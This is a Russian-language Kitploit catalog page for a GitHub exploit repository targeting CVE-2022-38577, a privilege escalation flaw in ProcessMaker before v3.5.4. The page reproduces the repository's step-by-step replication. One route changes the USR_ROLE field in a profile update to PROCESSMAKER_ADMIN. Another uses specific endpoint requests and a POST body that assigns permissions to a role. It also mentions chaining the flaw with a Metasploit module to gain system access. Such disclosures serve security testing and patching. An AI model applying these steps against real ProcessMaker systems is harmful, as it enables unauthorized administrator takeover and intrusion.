Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-38577-Processmaker — В ProcessMaker до версии v3.5.4 были обнаружены небезопасные разрешения на странице профиля пользователя. Эта уязвимость позволяет злоумышленникам повышать привилегии обычных пользователей до администраторов. | Kitploit
Инструменты/GitHubGitHub/sornram9254/cve-2022-38577-processmaker
Повышение привилегийФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеArchived
GitHubsornram9254/cve-2022-38577-processmaker

CVE-2022-38577-Processmaker

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

В ProcessMaker до версии v3.5.4 были обнаружены небезопасные разрешения на странице профиля пользователя. Эта уязвимость позволяет злоумышленникам повышать привилегии обычных пользователей до администраторов.

Репозиторий
3131 год назадЕщё не проверено

Этот репозиторий архивирован и перемещён в: https://github.com/sornram9254/CVE-BBP-VDP


ProcessMaker - Повышение привилегий через профиль пользователя

CVE-2022-38577

Было обнаружено, что ProcessMaker до версии v3.5.4 содержит небезопасные разрешения на странице профиля пользователя. Эта уязвимость позволяет злоумышленникам повышать привилегии обычных пользователей до администраторов.

* Этот эксплойт можно использовать с модулем Metasploit (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload для получения доступа к системе.

root@kitploit:~
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
    1. Log in as normal user.
    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
    3. Refresh page to get new role.

for 3.2.1 and before:
    1. Log in as normal user.
    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
    4. Update role to escalation privileges using POST Body request:
    POST /sysworkflow/en/neoclassic/roles/roles_Ajax
    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}

https://youtu.be/PVaChDG3ZQ0
CVE-2022-38577 : ProcessMaker - User Profile Privilege Escalation

TODO: Оптимизировать код [модуль requests] и обработку исключений.

Ссылки:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing

Скачать инструмент